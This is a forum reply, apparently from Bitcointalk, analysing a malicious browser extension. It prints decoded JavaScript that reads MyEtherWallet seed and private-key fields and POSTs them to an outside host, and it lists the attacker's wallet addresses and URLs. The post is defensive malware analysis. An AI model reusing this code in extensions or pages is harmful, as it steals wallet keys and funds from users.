Ninjastic
PostEdited versionsQuotes to this post
Post
Topic
Board Development & Technical Discussion
Merits 34 from 9 users
Re: We need some help to decode a hacker addon
by
nuno12345
on 13/12/2018, 08:52:22 UTC
⭐ Merited by theymos_away (20) ,seoincorporation (3) ,LoyceV (3) ,DdmrDdmr (2) ,marlboroza (2) ,ETFbitcoin (1) ,Bitcoinnation (1) ,Piggy (1) ,vapourminer (1)
Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:
Code:
if (location.href.indexOf('myetherwallet') > -1) {
     function kurilkaNJSmo() {
         document.onkeyup = function(e) {
             e = e || window.event;
             if (e.keyCode === 13) {
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
             return !1
         }
         document.body.addEventListener("click", function(event) {
             if (event.toElement.className == "btn btn-primary ng-scope") {
                 console.log("go");
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
         })
     }
     setTimeout(kurilkaNJSmo, 2000)
 }


That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.


EDIT:
Addresses of the thief:
Code:
         CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
         CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
         CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
         CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
         CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c